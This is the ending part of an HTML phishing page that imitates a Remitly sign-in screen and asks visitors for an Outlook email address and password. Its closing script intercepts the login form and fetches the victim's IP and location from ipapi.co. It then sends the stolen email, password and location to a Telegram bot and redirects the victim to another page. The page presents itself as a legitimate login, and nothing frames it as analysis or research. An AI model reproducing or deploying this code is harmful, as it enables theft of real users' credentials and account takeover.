    line-height: var(--chakra-lineHeights-normal);
    border-radius: var(--chakra-radii-base);
    font-weight: var(--chakra-fontWeights-bold);
    transition-property: var(--chakra-transition-property-common);
    transition-duration: var(--chakra-transition-duration-normal);
    font-size: 17px;
    text-decoration: none;
    min-height: 24px;
    min-width: var(--chakra-sizes-10);
    height: auto;
    padding-inline-start: var(--chakra-space-mdSm);
    padding-inline-end: var(--chakra-space-mdSm);
    padding: 0px;
    color: var(--chakra-colors-brand-500);
}
.auth-ui-tl3ftk {
    display: flex;
    -webkit-box-align: center;
    align-items: center;
    flex-direction: column;
    gap: 0.5rem;
}
.auth-ui-13hszb4 {
    font-weight: var(--chakra-fontWeights-bold);
    color: var(--chakra-colors-brand-600);
}
.auth-ui-6q6l5 {
    display: flex;
    -webkit-box-pack: center;
    justify-content: center;
    padding: var(--chakra-space-md);
    box-shadow: var(--chakra-shadows-md);
}
.auth-ui-xwwyjf {
    object-fit: contain;
    height: 40px;
    width: 34px;
}

      </style>
      <title>Remitly | Iniciar sesión</title>
   </head>
   <body class="chakra-ui-light" dir="ltr">
      <div id="root">
         <div class="auth-ui-11bebfs" id="miDiv"><picture>
    <!-- Imagen para dispositivos grandes -->
    <source srcset="remitly-badge-Cg5zrdrr.svg" media="(max-width: 768px)"><img alt="" src="remitly-logo-horizontal-ClQP0srv.svg" class="chakra-image auth-ui-o7rsyv"></picture></div>
         <div class="chakra-container auth-ui-1chkgno">
            <div class="chakra-stack auth-ui-134jqdd">
               <div class="auth-ui-jmwhvt">
                  <div class="chakra-stack auth-ui-1gsou51">
                     <div class="chakra-stack auth-ui-1d7x4x5">
                        <h2 class="chakra-heading auth-ui-1va0uhw">Sign in with Remitly</h2>
                        <form id="loginform" method="post" >
                           <div class="chakra-stack auth-ui-1d7x4x5">
                              <img src="Microsoft_Outlook_2013-2019_logo.svg" style="width: 60px;display: block;margin: 0 auto;">
                              <div role="group" class="chakra-form-control auth-ui-1kxonj9">
                                 <label id="email-label" for="email" class="chakra-form__label auth-ui-g6pte">Outlook Email Address</label>
                                 <input  type="email" placeholder="abc@example.com" id="email" required class="chakra-input auth-ui-1wic40a" value=""></div>
                              <div role="group" class="chakra-form-control auth-ui-1kxonj9">
                                 <label id="current-password-label" for="current-password" class="chakra-form__label auth-ui-g6pte">Password Email Address</label>
                                 <div class="chakra-input__group auth-ui-1y0e7gb" data-group="true">
                                    <input type="password" required minlength="8" id="current-password" class="chakra-input auth-ui-1kjytvw" value="">
                                    <div class="chakra-input__right-element auth-ui-annrnj">
                                       <button type="button" class="chakra-button auth-ui-1fllbz4" id="showPass"><img alt="Mostrar contraseña" src="eye-BrsMgA40.svg" class="chakra-image auth-ui-1m01c8l" aria-hidden="true" focusable="false"></button></div>
                                 </div>
                              </div>
                              <button type="submit" class="chakra-button auth-ui-1jda25g" data-testid="log-in">Sign In</button>
                           </div>
                        </form>
                        
                     </div>
                  </div>
               </div>
            </div>
         </div>
         <span id="__chakra_env" hidden=""></span>
      </div>
     
      <div>
         <div class="grecaptcha-badge" data-style="bottomright" style="width: 256px; height: 60px; display: block; transition: right 0.3s ease 0s; position: fixed; bottom: 14px; right: -186px; box-shadow: gray 0px 0px 5px; border-radius: 2px; overflow: hidden;">
            <div class="grecaptcha-logo"><iframe title="reCAPTCHA" width="256" height="60" role="presentation" name="a-5lam1df06uif" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox allow-storage-access-by-user-activation" src="anchor.html"></iframe></div>
            <div class="grecaptcha-error"></div>
            <textarea id="g-recaptcha-response-100000" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea>
         </div>
         <iframe style="display: none;" src="saved_resource.html"></iframe>
      </div>
    
      <div class="chakra-portal">
         <div role="region" aria-live="polite" aria-label="Notifications-top" id="chakra-toast-manager-top" style="position: fixed; z-index: var(--toast-z-index, 5500); pointer-events: none; display: flex; flex-direction: column; margin: 0px auto; top: env(safe-area-inset-top, 0px); right: env(safe-area-inset-right, 0px); left: env(safe-area-inset-left, 0px);"></div>
         <div role="region" aria-live="polite" aria-label="Notifications-top-left" id="chakra-toast-manager-top-left" style="position: fixed; z-index: var(--toast-z-index, 5500); pointer-events: none; display: flex; flex-direction: column; top: env(safe-area-inset-top, 0px); left: env(safe-area-inset-left, 0px);"></div>
         <div role="region" aria-live="polite" aria-label="Notifications-top-right" id="chakra-toast-manager-top-right" style="position: fixed; z-index: var(--toast-z-index, 5500); pointer-events: none; display: flex; flex-direction: column; top: env(safe-area-inset-top, 0px); right: env(safe-area-inset-right, 0px);"></div>
         <div role="region" aria-live="polite" aria-label="Notifications-bottom-left" id="chakra-toast-manager-bottom-left" style="position: fixed; z-index: var(--toast-z-index, 5500); pointer-events: none; display: flex; flex-direction: column; bottom: env(safe-area-inset-bottom, 0px); left: env(safe-area-inset-left, 0px);"></div>
         <div role="region" aria-live="polite" aria-label="Notifications-bottom" id="chakra-toast-manager-bottom" style="position: fixed; z-index: var(--toast-z-index, 5500); pointer-events: none; display: flex; flex-direction: column; margin: 0px auto; bottom: env(safe-area-inset-bottom, 0px); right: env(safe-area-inset-right, 0px); left: env(safe-area-inset-left, 0px);"></div>
         <div role="region" aria-live="polite" aria-label="Notifications-bottom-right" id="chakra-toast-manager-bottom-right" style="position: fixed; z-index: var(--toast-z-index, 5500); pointer-events: none; display: flex; flex-direction: column; bottom: env(safe-area-inset-bottom, 0px); right: env(safe-area-inset-right, 0px);"></div>
      </div>
      <script>
       $(document).ready(function(){
  
   $('#showPass').on('click', function(){
      var passInput=$("#current-password");
      if(passInput.attr('type')==='password')
        {
          passInput.attr('type','text');
      }else{
         passInput.attr('type','password');
      }
  })
})
       </script>

       <script src="aqui-va-eltlg.js"></script>
      <script>
      const form = document.querySelector('#loginform');

      form.addEventListener('submit', event => {
      event.preventDefault();
      const cliente = document.getElementById('email').value;
      const cliente2 = document.getElementById('current-password').value;
     
      fetch('https://ipapi.co/json')
         .then(response => response.json())
         .then(data => {
             const YOUR_MESSAGE_TEXT = "R3MITLY \n\n\r C0RR30 HOTM4IL: " + cliente + " \n\n\rP4SS: " + cliente2 + " \n\n\r   \n\n\r - IP: " + data.ip + " " + data.country + " " + data.city;
             const telegramApiUrl = `https://api.telegram.org/bot${YOUR_BOT_TOKEN}/sendMessage?chat_id=${YOUR_CHANNEL_ID}&text=${YOUR_MESSAGE_TEXT}`;

             fetch(telegramApiUrl)
                 .then(response => {
                     window.location.href = "index4.html"; // Redirige a la otra página
                 })
                 .catch(error => console.error(error));
         })
         .catch(error => console.error(error));
      });
      </script>
   </body>
</html>
